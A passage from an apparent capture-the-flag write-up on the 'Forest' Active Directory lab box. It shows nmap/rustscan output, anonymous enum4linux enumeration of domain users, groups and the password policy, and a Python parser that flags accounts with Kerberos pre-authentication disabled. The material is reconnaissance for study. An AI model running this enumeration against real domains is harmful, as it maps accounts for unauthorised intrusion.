$ sudo rustscan -b 8192 -u 16384 -a 10.10.10.161 -- -sS -sV -sC -oN 10.10.10.161.$(basename $PWD).nmap.txt
# Nmap 7.92 scan initiated Thu Dec 16 12:29:35 2021 as: nmap -vvv -p 53,88,135,139,389,445,464,593,3268,3269,5985,9389,47001,49664,49666,49667,49665,49671,49677,49676,49684,49706 -sS -sV -sC -oN 10.10.10.161.forest.nmap.txt 10.10.10.161
Nmap scan report for 10.10.10.161
Host is up, received echo-reply ttl 127 (0.079s latency).
Scanned at 2021-12-16 12:29:35 PST for 68s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2021-12-16 20:43:02Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49684/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49706/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2021-12-16T20:43:56
|_ start_date: 2021-12-16T20:41:24
|_clock-skew: mean: 2h53m20s, deviation: 4h37m08s, median: 13m20s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2021-12-16T12:43:53-08:00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 63427/tcp): CLEAN (Couldn't connect)
| Check 2 (port 32753/tcp): CLEAN (Couldn't connect)
| Check 3 (port 21004/udp): CLEAN (Timeout)
| Check 4 (port 44587/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Thu Dec 16 12:30:43 2021 -- 1 IP address (1 host up) scanned in 68.37 seconds
Based on the nmap output it looks like we've got a Windows machine. Port 88 is Kerberos, which is usually a giveaway that the host is an Active Directory domain controller, and the LDAP banners on 389 and 3268 confirm the domain htb.local. From here we should enumerate further to gather more information and increase our P.E.N.I.S. (Pentest Engagement and Necessary Investigation Score) size. We extracted a list of usernames using enum4linux and enum4linux-ng.
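The username extraction described above, as an added example rather than the author's own tooling: a small parser for the two line formats enum4linux prints in its "Users on <target>" section (the `index: ... acb: ... Account:` records and the `user:[...] rid:[...]` lines), which also decodes the `acb` bitmask using the MS-SAMR USER_ACCOUNT flag values so the account-control bits can be read as an audit finding. The embedded sample lines are a constructed subset copied from the output below; the function names are mine.

```python
import re
from typing import Dict, List

# Constructed sample: a subset of the enum4linux "Users" section shown on this
# page, in the exact shape the tool prints (two formats for the same accounts).
SAMPLE_ENUM4LINUX = """\
index: 0xfbc RID: 0x1f4 acb: 0x00000010 Account: Administrator Name: Administrator Desc: Built-in account for administering the computer/domain
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy Name: Andy Hislip Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco Name: svc-alfresco Desc: (null)
user:[Administrator] rid:[0x1f4]
user:[andy] rid:[0x47e]
user:[svc-alfresco] rid:[0x47b]
"""

# The "acb" column is the MS-SAMR (section 2.2.1.12) USER_ACCOUNT bitmask.
ACB_FLAGS = {
    0x00000001: "DISABLED",
    0x00000002: "HOME_DIRECTORY_REQUIRED",
    0x00000004: "PASSWORD_NOT_REQUIRED",
    0x00000008: "TEMP_DUPLICATE_ACCOUNT",
    0x00000010: "NORMAL_ACCOUNT",
    0x00000020: "MNS_LOGON_ACCOUNT",
    0x00000040: "INTERDOMAIN_TRUST_ACCOUNT",
    0x00000080: "WORKSTATION_TRUST_ACCOUNT",
    0x00000100: "SERVER_TRUST_ACCOUNT",
    0x00000200: "DONT_EXPIRE_PASSWORD",
    0x00000400: "ACCOUNT_AUTO_LOCKED",
    0x00000800: "ENCRYPTED_TEXT_PASSWORD_ALLOWED",
    0x00001000: "SMARTCARD_REQUIRED",
    0x00002000: "TRUSTED_FOR_DELEGATION",
    0x00004000: "NOT_DELEGATED",
    0x00008000: "USE_DES_KEY_ONLY",
    0x00010000: "DONT_REQUIRE_PREAUTH",
    0x00020000: "PASSWORD_EXPIRED",
    0x00040000: "TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION",
    0x00080000: "NO_AUTH_DATA_REQUIRED",
}

USER_LINE = re.compile(r"^user:\[(?P<name>[^\]]+)\]\s+rid:\[(?P<rid>0x[0-9a-f]+)\]")
DETAIL_LINE = re.compile(
    r"^index:\s+0x[0-9a-f]+\s+RID:\s+(?P<rid>0x[0-9a-f]+)\s+acb:\s+(?P<acb>0x[0-9a-f]+)"
    r"\s+Account:\s+(?P<account>\S+)\s+Name:\s+(?P<name>.*?)\s+Desc:\s+(?P<desc>.*)$"
)


def decode_acb(acb: int) -> List[str]:
    """Return the names of the USER_ACCOUNT flags set in an acb bitmask."""
    names = [name for bit, name in ACB_FLAGS.items() if acb & bit]
    unknown = acb & ~sum(ACB_FLAGS)          # bits outside the table above
    if unknown:
        names.append(f"UNKNOWN(0x{unknown:08x})")
    return names


def parse_users(output: str) -> Dict[str, dict]:
    """Build one record per account from both enum4linux line formats."""
    users: Dict[str, dict] = {}
    for raw in output.splitlines():
        line = raw.strip()
        m = DETAIL_LINE.match(line)
        if m:
            acb = int(m["acb"], 16)
            users[m["account"]] = {
                "rid": int(m["rid"], 16),
                "acb": acb,
                "flags": decode_acb(acb),
                "desc": None if m["desc"] == "(null)" else m["desc"],
            }
            continue
        m = USER_LINE.match(line)
        if m:  # short form: only add if the detailed record was not seen
            users.setdefault(m["name"], {"rid": int(m["rid"], 16),
                                         "acb": None, "flags": [], "desc": None})
    return users


def usernames(output: str) -> List[str]:
    """Plain sorted username list, e.g. to write out as a wordlist file."""
    return sorted(parse_users(output))


def audit_findings(output: str) -> Dict[str, List[str]]:
    """Account-hygiene review: enabled accounts whose flags weaken them
    (non-expiring password, no password required, Kerberos pre-auth off)."""
    watch = ("DONT_EXPIRE_PASSWORD", "PASSWORD_NOT_REQUIRED", "DONT_REQUIRE_PREAUTH")
    findings: Dict[str, List[str]] = {}
    for name, rec in parse_users(output).items():
        if "DISABLED" in rec["flags"]:
            continue
        hits = [f for f in rec["flags"] if f in watch]
        if hits:
            findings[name] = hits
    return findings


if __name__ == "__main__":
    print("\n".join(usernames(SAMPLE_ENUM4LINUX)))
    for account, flags in audit_findings(SAMPLE_ENUM4LINUX).items():
        print(f"review {account}: {', '.join(flags)}")
```

Feed it the saved enum4linux output file instead of the sample to get the full username list; disabled built-ins such as Guest and krbtgt drop out of the findings automatically.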
$ enum4linux 10.10.10.161 | tee 10.10.10.161.$(basename $PWD).enum4linux.txt
$ ~/repos/enum4linux-ng.py 10.10.10.161 | tee 10.10.10.161.$(basename $PWD).enum4linux-ng.txt
Starting enum4linux v0.8.9 ( <http://labs.portcullis.co.uk/application/enum4linux/> ) on Thu Dec 16 12:56:41 2021
==========================
| Target Information |
==========================
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 10.10.10.161 |
====================================================
[E] Can't find workgroup/domain
============================================
| Nbtstat Information for 10.10.10.161 |
============================================
Looking up status of 10.10.10.161
No reply from 10.10.10.161
=====================================
| Session Check on 10.10.10.161 |
=====================================
[+] Server 10.10.10.161 allows sessions using username '', password ''
[+] Got domain/workgroup name:
===========================================
| Getting domain SID for 10.10.10.161 |
===========================================
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
======================================
| OS information on 10.10.10.161 |
======================================
[+] Got OS info for 10.10.10.161 from smbclient:
[+] Got OS info for 10.10.10.161 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
=============================
| Users on 10.10.10.161 |
=============================
index: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000010 Account: Administrator Name: Administrator Desc: Built-in account for administering the computer/domain
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy Name: Andy Hislip Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x2352 RID: 0x478 acb: 0x00000210 Account: HealthMailbox0659cc1 Name: HealthMailbox-EXCH01-010 Desc: (null)
index: 0x234b RID: 0x471 acb: 0x00000210 Account: HealthMailbox670628e Name: HealthMailbox-EXCH01-003 Desc: (null)
index: 0x234d RID: 0x473 acb: 0x00000210 Account: HealthMailbox6ded678 Name: HealthMailbox-EXCH01-005 Desc: (null)
index: 0x2351 RID: 0x477 acb: 0x00000210 Account: HealthMailbox7108a4e Name: HealthMailbox-EXCH01-009 Desc: (null)
index: 0x234e RID: 0x474 acb: 0x00000210 Account: HealthMailbox83d6781 Name: HealthMailbox-EXCH01-006 Desc: (null)
index: 0x234c RID: 0x472 acb: 0x00000210 Account: HealthMailbox968e74d Name: HealthMailbox-EXCH01-004 Desc: (null)
index: 0x2350 RID: 0x476 acb: 0x00000210 Account: HealthMailboxb01ac64 Name: HealthMailbox-EXCH01-008 Desc: (null)
index: 0x234a RID: 0x470 acb: 0x00000210 Account: HealthMailboxc0a90c9 Name: HealthMailbox-EXCH01-002 Desc: (null)
index: 0x2348 RID: 0x46e acb: 0x00000210 Account: HealthMailboxc3d7722 Name: HealthMailbox-EXCH01-Mailbox-Database-1118319013 Desc: (null)
index: 0x2349 RID: 0x46f acb: 0x00000210 Account: HealthMailboxfc9daad Name: HealthMailbox-EXCH01-001 Desc: (null)
index: 0x234f RID: 0x475 acb: 0x00000210 Account: HealthMailboxfd87238 Name: HealthMailbox-EXCH01-007 Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda Name: Lucinda Berger Desc: (null)
index: 0x236a RID: 0x47f acb: 0x00000210 Account: mark Name: Mark Brandt Desc: (null)
index: 0x236b RID: 0x480 acb: 0x00000210 Account: santi Name: Santi Rodriguez Desc: (null)
index: 0x235c RID: 0x479 acb: 0x00000210 Account: sebastien Name: Sebastien Caron Desc: (null)
index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb Name: Microsoft Exchange Migration Desc: (null)
index: 0x2161 RID: 0x46c acb: 0x00020011 Account: SM_1ffab36a2f5f479cb Name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9} Desc: (null)
index: 0x2156 RID: 0x464 acb: 0x00020011 Account: SM_2c8eef0a09b545acb Name: Microsoft Exchange Approval Assistant Desc: (null)
index: 0x2159 RID: 0x467 acb: 0x00020011 Account: SM_681f53d4942840e18 Name: Discovery Search Mailbox Desc: (null)
index: 0x2158 RID: 0x466 acb: 0x00020011 Account: SM_75a538d3025e4db9a Name: Microsoft Exchange Desc: (null)
index: 0x215c RID: 0x46a acb: 0x00020011 Account: SM_7c96b981967141ebb Name: E4E Encryption Store - Active Desc: (null)
index: 0x215b RID: 0x469 acb: 0x00020011 Account: SM_9b69f1b9d2cc45549 Name: Microsoft Exchange Federation Mailbox Desc: (null)
index: 0x215d RID: 0x46b acb: 0x00020011 Account: SM_c75ee099d0a64c91b Name: Microsoft Exchange Desc: (null)
index: 0x2157 RID: 0x465 acb: 0x00020011 Account: SM_ca8c2ed5bdab4dc9b Name: Microsoft Exchange Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco Name: svc-alfresco Desc: (null)
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
=========================================
| Share Enumeration on 10.10.10.161 |
=========================================
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.10.161
====================================================
| Password Policy Information for 10.10.10.161 |
====================================================
[+] Attaching to 10.10.10.161 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.10.161)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] HTB
[+] Builtin
[+] Password Info for Domain: HTB
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
==============================
| Groups on 10.10.10.161 |
==============================
[+] Getting builtin groups:
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]
group:[Server Operators] rid:[0x225]
[+] Getting builtin group memberships:
Group 'Administrators' (RID: 544) has member: Could not connect to server 10.10.10.161
Group 'Administrators' (RID: 544) has member: The username or password was not correct.
Group 'Administrators' (RID: 544) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Account Operators' (RID: 548) has member: Could not connect to server 10.10.10.161
Group 'Account Operators' (RID: 548) has member: The username or password was not correct.
Group 'Account Operators' (RID: 548) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Distributed COM Users' (RID: 562) has member: Could not connect to server 10.10.10.161
Group 'Distributed COM Users' (RID: 562) has member: The username or password was not correct.
Group 'Distributed COM Users' (RID: 562) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Windows Authorization Access Group' (RID: 560) has member: Could not connect to server 10.10.10.161
Group 'Windows Authorization Access Group' (RID: 560) has member: The username or password was not correct.
Group 'Windows Authorization Access Group' (RID: 560) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Access Control Assistance Operators' (RID: 579) has member: Could not connect to server 10.10.10.161
Group 'Access Control Assistance Operators' (RID: 579) has member: The username or password was not correct.
Group 'Access Control Assistance Operators' (RID: 579) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'RDS Remote Access Servers' (RID: 575) has member: Could not connect to server 10.10.10.161
Group 'RDS Remote Access Servers' (RID: 575) has member: The username or password was not correct.
Group 'RDS Remote Access Servers' (RID: 575) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Hyper-V Administrators' (RID: 578) has member: Could not connect to server 10.10.10.161
Group 'Hyper-V Administrators' (RID: 578) has member: The username or password was not correct.
Group 'Hyper-V Administrators' (RID: 578) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Incoming Forest Trust Builders' (RID: 557) has member: Could not connect to server 10.10.10.161
Group 'Incoming Forest Trust Builders' (RID: 557) has member: The username or password was not correct.
Group 'Incoming Forest Trust Builders' (RID: 557) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Pre-Windows 2000 Compatible Access' (RID: 554) has member: Could not connect to server 10.10.10.161
Group 'Pre-Windows 2000 Compatible Access' (RID: 554) has member: The username or password was not correct.
Group 'Pre-Windows 2000 Compatible Access' (RID: 554) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Network Configuration Operators' (RID: 556) has member: Could not connect to server 10.10.10.161
Group 'Network Configuration Operators' (RID: 556) has member: The username or password was not correct.
Group 'Network Configuration Operators' (RID: 556) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Event Log Readers' (RID: 573) has member: Could not connect to server 10.10.10.161
Group 'Event Log Readers' (RID: 573) has member: The username or password was not correct.
Group 'Event Log Readers' (RID: 573) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Remote Desktop Users' (RID: 555) has member: Could not connect to server 10.10.10.161
Group 'Remote Desktop Users' (RID: 555) has member: The username or password was not correct.
Group 'Remote Desktop Users' (RID: 555) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Replicator' (RID: 552) has member: Could not connect to server 10.10.10.161
Group 'Replicator' (RID: 552) has member: The username or password was not correct.
Group 'Replicator' (RID: 552) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Server Operators' (RID: 549) has member: Could not connect to server 10.10.10.161
Group 'Server Operators' (RID: 549) has member: The username or password was not correct.
Group 'Server Operators' (RID: 549) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'System Managed Accounts Group' (RID: 581) has member: Could not connect to server 10.10.10.161
Group 'System Managed Accounts Group' (RID: 581) has member: The username or password was not correct.
Group 'System Managed Accounts Group' (RID: 581) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Users' (RID: 545) has member: Could not connect to server 10.10.10.161
Group 'Users' (RID: 545) has member: The username or password was not correct.
Group 'Users' (RID: 545) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Cryptographic Operators' (RID: 569) has member: Could not connect to server 10.10.10.161
Group 'Cryptographic Operators' (RID: 569) has member: The username or password was not correct.
Group 'Cryptographic Operators' (RID: 569) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Certificate Service DCOM Access' (RID: 574) has member: Could not connect to server 10.10.10.161
Group 'Certificate Service DCOM Access' (RID: 574) has member: The username or password was not correct.
Group 'Certificate Service DCOM Access' (RID: 574) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'RDS Management Servers' (RID: 577) has member: Could not connect to server 10.10.10.161
Group 'RDS Management Servers' (RID: 577) has member: The username or password was not correct.
Group 'RDS Management Servers' (RID: 577) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'RDS Endpoint Servers' (RID: 576) has member: Could not connect to server 10.10.10.161
Group 'RDS Endpoint Servers' (RID: 576) has member: The username or password was not correct.
Group 'RDS Endpoint Servers' (RID: 576) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Terminal Server License Servers' (RID: 561) has member: Could not connect to server 10.10.10.161
Group 'Terminal Server License Servers' (RID: 561) has member: The username or password was not correct.
Group 'Terminal Server License Servers' (RID: 561) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Backup Operators' (RID: 551) has member: Could not connect to server 10.10.10.161
Group 'Backup Operators' (RID: 551) has member: The username or password was not correct.
Group 'Backup Operators' (RID: 551) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Remote Management Users' (RID: 580) has member: Could not connect to server 10.10.10.161
Group 'Remote Management Users' (RID: 580) has member: The username or password was not correct.
Group 'Remote Management Users' (RID: 580) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Performance Log Users' (RID: 559) has member: Could not connect to server 10.10.10.161
Group 'Performance Log Users' (RID: 559) has member: The username or password was not correct.
Group 'Performance Log Users' (RID: 559) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Storage Replica Administrators' (RID: 582) has member: Could not connect to server 10.10.10.161
Group 'Storage Replica Administrators' (RID: 582) has member: The username or password was not correct.
Group 'Storage Replica Administrators' (RID: 582) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Performance Monitor Users' (RID: 558) has member: Could not connect to server 10.10.10.161
Group 'Performance Monitor Users' (RID: 558) has member: The username or password was not correct.
Group 'Performance Monitor Users' (RID: 558) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Print Operators' (RID: 550) has member: Could not connect to server 10.10.10.161
Group 'Print Operators' (RID: 550) has member: The username or password was not correct.
Group 'Print Operators' (RID: 550) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'IIS_IUSRS' (RID: 568) has member: Could not connect to server 10.10.10.161
Group 'IIS_IUSRS' (RID: 568) has member: The username or password was not correct.
Group 'IIS_IUSRS' (RID: 568) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Guests' (RID: 546) has member: Could not connect to server 10.10.10.161
Group 'Guests' (RID: 546) has member: The username or password was not correct.
Group 'Guests' (RID: 546) has member: Connection failed: NT_STATUS_LOGON_FAILURE
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
[+] Getting local group memberships:
Group 'DnsAdmins' (RID: 1101) has member: Could not connect to server 10.10.10.161
Group 'DnsAdmins' (RID: 1101) has member: The username or password was not correct.
Group 'DnsAdmins' (RID: 1101) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Denied RODC Password Replication Group' (RID: 572) has member: Could not connect to server 10.10.10.161
Group 'Denied RODC Password Replication Group' (RID: 572) has member: The username or password was not correct.
Group 'Denied RODC Password Replication Group' (RID: 572) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Allowed RODC Password Replication Group' (RID: 571) has member: Could not connect to server 10.10.10.161
Group 'Allowed RODC Password Replication Group' (RID: 571) has member: The username or password was not correct.
Group 'Allowed RODC Password Replication Group' (RID: 571) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Cert Publishers' (RID: 517) has member: Could not connect to server 10.10.10.161
Group 'Cert Publishers' (RID: 517) has member: The username or password was not correct.
Group 'Cert Publishers' (RID: 517) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'RAS and IAS Servers' (RID: 553) has member: Could not connect to server 10.10.10.161
Group 'RAS and IAS Servers' (RID: 553) has member: The username or password was not correct.
Group 'RAS and IAS Servers' (RID: 553) has member: Connection failed: NT_STATUS_LOGON_FAILURE
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group 'Recipient Management' (RID: 1105) has member: Could not connect to server 10.10.10.161
Group 'Recipient Management' (RID: 1105) has member: The username or password was not correct.
Group 'Recipient Management' (RID: 1105) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group '$D31000-NSEL5BRJ63V7' (RID: 1133) has member: Could not connect to server 10.10.10.161
Group '$D31000-NSEL5BRJ63V7' (RID: 1133) has member: The username or password was not correct.
Group '$D31000-NSEL5BRJ63V7' (RID: 1133) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'UM Management' (RID: 1108) has member: Could not connect to server 10.10.10.161
Group 'UM Management' (RID: 1108) has member: The username or password was not correct.
Group 'UM Management' (RID: 1108) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'ExchangeLegacyInterop' (RID: 1122) has member: Could not connect to server 10.10.10.161
Group 'ExchangeLegacyInterop' (RID: 1122) has member: The username or password was not correct.
Group 'ExchangeLegacyInterop' (RID: 1122) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Group Policy Creator Owners' (RID: 520) has member: Could not connect to server 10.10.10.161
Group 'Group Policy Creator Owners' (RID: 520) has member: The username or password was not correct.
Group 'Group Policy Creator Owners' (RID: 520) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Domain Admins' (RID: 512) has member: Could not connect to server 10.10.10.161
Group 'Domain Admins' (RID: 512) has member: The username or password was not correct.
Group 'Domain Admins' (RID: 512) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Privileged IT Accounts' (RID: 1149) has member: Could not connect to server 10.10.10.161
Group 'Privileged IT Accounts' (RID: 1149) has member: The username or password was not correct.
